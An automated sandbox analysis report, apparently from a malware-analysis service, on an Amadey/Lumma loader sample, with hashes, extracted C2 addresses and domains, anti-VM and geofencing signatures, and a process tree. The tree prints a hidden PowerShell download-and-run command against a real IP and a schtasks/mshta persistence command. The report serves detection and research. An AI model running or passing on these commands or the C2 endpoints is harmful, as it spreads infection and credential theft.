Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
10/04/2025, 18:44
Static task
static1
General
-
Target
random.exe
-
Size
938KB
-
MD5
1c22248f7a81f635dc44cd411f67c4ef
-
SHA1
3d18eb2a1693c836eec5c56c5dd398748f730b44
-
SHA256
500f210b46e13fd65ec90391c4c9ed18601405c73c0eaa5367866c6ca93bd285
-
SHA512
8e736f3bba126ca0c4378a885389a78d84b78e4d4ccffe7485d2d2169193a4f1130857b079b8ff14a0c3bd1c4a1abdb1592dde773d49ea64a9b0a9953b775415
-
SSDEEP
24576:BqDEvCTbMWu7rQYlBQcBiT6rprG8a07u:BTvC/MTQYxsWR7a07
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://reformzv.digital/guud
https://ojrxsafer.top/shpaoz
https://plantainklj.run/opafg
https://puerrogfh.live/iqwez
https://quavabvc.top/iuzhd
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://rambutanvcx.run/adioz
https://ywmedici.top/noagis
https://starcloc.bet/GOksAo
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://1targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
Signatures
-
Amadey family
-
Lumma family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 14 6040 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 6040 powershell.exe -
Downloads MZ/PE file 3 IoCs
flow pid Process 104 4848 futors.exe 14 6040 powershell.exe 88 4428 rapes.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation futors.exe -
Executes dropped EXE 7 IoCs
pid Process 1516 TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE 4428 rapes.exe 2468 rapes.exe 4192 amnew.exe 4848 futors.exe 5164 joker1221.exe 3572 legendarik.exe -
Identifies Wine through registry keys 2 TTPs 3 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 1516 TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE 4428 rapes.exe 2468 rapes.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5164 set thread context of 4976 5164 joker1221.exe 119 PID 3572 set thread context of 2452 3572 legendarik.exe 123 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\rapes.job TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3020 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 6040 powershell.exe 6040 powershell.exe 1516 TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE 1516 TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE 4428 rapes.exe 4428 rapes.exe 2468 rapes.exe 2468 rapes.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 6040 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2836 random.exe 2836 random.exe 2836 random.exe 4192 amnew.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2836 random.exe 2836 random.exe 2836 random.exe -
Suspicious use of WriteProcessMemory 55 IoCs
description pid Process procid_target PID 2836 wrote to memory of 5984 2836 random.exe 86 PID 2836 wrote to memory of 5984 2836 random.exe 86 PID 2836 wrote to memory of 5984 2836 random.exe 86 PID 2836 wrote to memory of 788 2836 random.exe 87 PID 2836 wrote to memory of 788 2836 random.exe 87 PID 2836 wrote to memory of 788 2836 random.exe 87 PID 5984 wrote to memory of 3020 5984 cmd.exe 89 PID 5984 wrote to memory of 3020 5984 cmd.exe 89 PID 5984 wrote to memory of 3020 5984 cmd.exe 89 PID 788 wrote to memory of 6040 788 mshta.exe 92 PID 788 wrote to memory of 6040 788 mshta.exe 92 PID 788 wrote to memory of 6040 788 mshta.exe 92 PID 6040 wrote to memory of 1516 6040 powershell.exe 112 PID 6040 wrote to memory of 1516 6040 powershell.exe 112 PID 6040 wrote to memory of 1516 6040 powershell.exe 112 PID 1516 wrote to memory of 4428 1516 TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE 113 PID 1516 wrote to memory of 4428 1516 TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE 113 PID 1516 wrote to memory of 4428 1516 TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE 113 PID 4428 wrote to memory of 4192 4428 rapes.exe 115 PID 4428 wrote to memory of 4192 4428 rapes.exe 115 PID 4428 wrote to memory of 4192 4428 rapes.exe 115 PID 4192 wrote to memory of 4848 4192 amnew.exe 116 PID 4192 wrote to memory of 4848 4192 amnew.exe 116 PID 4192 wrote to memory of 4848 4192 amnew.exe 116 PID 4848 wrote to memory of 5164 4848 futors.exe 117 PID 4848 wrote to memory of 5164 4848 futors.exe 117 PID 5164 wrote to memory of 2896 5164 joker1221.exe 118 PID 5164 wrote to memory of 2896 5164 joker1221.exe 118 PID 5164 wrote to memory of 2896 5164 joker1221.exe 118 PID 5164 wrote to memory of 4976 5164 joker1221.exe 119 PID 5164 wrote to memory of 4976 5164 joker1221.exe 119 PID 5164 wrote to memory of 4976 5164 joker1221.exe 119 PID 5164 wrote to memory of 4976 5164 joker1221.exe 119 PID 5164 wrote to memory of 4976 5164 joker1221.exe 119 PID 5164 wrote to memory of 4976 5164 joker1221.exe 119 PID 5164 wrote to memory of 4976 5164 joker1221.exe 119 PID 5164 wrote to memory of 4976 5164 joker1221.exe 119 PID 5164 wrote to memory of 4976 5164 joker1221.exe 119 PID 4848 wrote to memory of 3572 4848 futors.exe 120 PID 4848 wrote to memory of 3572 4848 futors.exe 120 PID 3572 wrote to memory of 768 3572 legendarik.exe 121 PID 3572 wrote to memory of 768 3572 legendarik.exe 121 PID 3572 wrote to memory of 768 3572 legendarik.exe 121 PID 3572 wrote to memory of 3604 3572 legendarik.exe 122 PID 3572 wrote to memory of 3604 3572 legendarik.exe 122 PID 3572 wrote to memory of 3604 3572 legendarik.exe 122 PID 3572 wrote to memory of 2452 3572 legendarik.exe 123 PID 3572 wrote to memory of 2452 3572 legendarik.exe 123 PID 3572 wrote to memory of 2452 3572 legendarik.exe 123 PID 3572 wrote to memory of 2452 3572 legendarik.exe 123 PID 3572 wrote to memory of 2452 3572 legendarik.exe 123 PID 3572 wrote to memory of 2452 3572 legendarik.exe 123 PID 3572 wrote to memory of 2452 3572 legendarik.exe 123 PID 3572 wrote to memory of 2452 3572 legendarik.exe 123 PID 3572 wrote to memory of 2452 3572 legendarik.exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn mLG3mmaAUDE /tr "mshta C:\Users\Admin\AppData\Local\Temp\oFjGg4UJ1.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5984 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn mLG3mmaAUDE /tr "mshta C:\Users\Admin\AppData\Local\Temp\oFjGg4UJ1.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3020
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\oFjGg4UJ1.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:6040 -
C:\Users\Admin\AppData\Local\TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE"C:\Users\Admin\AppData\Local\TempHCHGNMHOOK9TBUUOC6BYWI6BSGFLWXCV.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Users\Admin\AppData\Local\Temp\10534890101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10534890101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Users\Admin\AppData\Local\Temp\10028410101\joker1221.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\joker1221.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5164 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:2896
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
PID:4976
-
-
-
C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:768
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:3604
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
PID:2452
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2468
Network
MITRE ATT&CK Enterprise v16
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.1MB
MD59e3768b4d556fa13b3138fa0bfc87ada
SHA103ad8e08a5154ba7c16672a313dd15235db7ab34
SHA256f2c97a36c4c17e511516dff225d42230023bcdd5c90d725963690564b6ac4362
SHA5122e55d39b5a1c83cef7a49ef977a2a50d83b978286c57daf2d2e1d644ed36299da1bd0d3bdf1aa1d228b50660335ef2a2641c9c12b1afe6bc9642e04be87f50b0
-
Filesize
667KB
MD5be32c5381d9dc0d8f7e467fe89286748
SHA10b7c1c54efbeaf199ac327d3b958dc5aae8131b6
SHA25603b76f25a25cf571a329d3671ef89de970af306a097a3070c507296ca14efd56
SHA5122161ad19021731288967f57e16f4b601f140ec05d7dfcd93adf2b3fd2a270b9326056a9495417b2faa0de86c61b1a15d855d0fcaca41bb2401fd23c134a65b47
-
Filesize
2.1MB
MD52a3fbf508bbf6c77fb9138e6bdc0c114
SHA18de41763cb3b5011ef1bb611fc258184b24ca258
SHA256b87944aaa06658715496841be98f0f4791165f2d0d2a85267bf5fc80ef59f74f
SHA512ed5cc3d07923986cc2751d1e5d833fc2a83de70fb68926378b9dbb0d83506ca7af39ce3a9bc46461c96bf5c2a35c04e106d56296b0d010a64a6c128057a9c84a
-
Filesize
429KB
MD522892b8303fa56f4b584a04c09d508d8
SHA1e1d65daaf338663006014f7d86eea5aebf142134
SHA25687618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f
SHA512852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
717B
MD5bcd4b4acf2ee04c2fe4ee6a73c1ee806
SHA14a7b6a358e8aa82195c0ac644f722658cff085df
SHA256aa0975916934cf9c9dbe2aaa5d41f59e1d624174d91a1afda37418a51969afa5
SHA512389aae4b1e0d769b4415526d86e481ecd7813227518ae077a6b775be040a987a428b8e9defecc854fe8e9286dec1ab7791573976f84556c535aaa6e99d973d80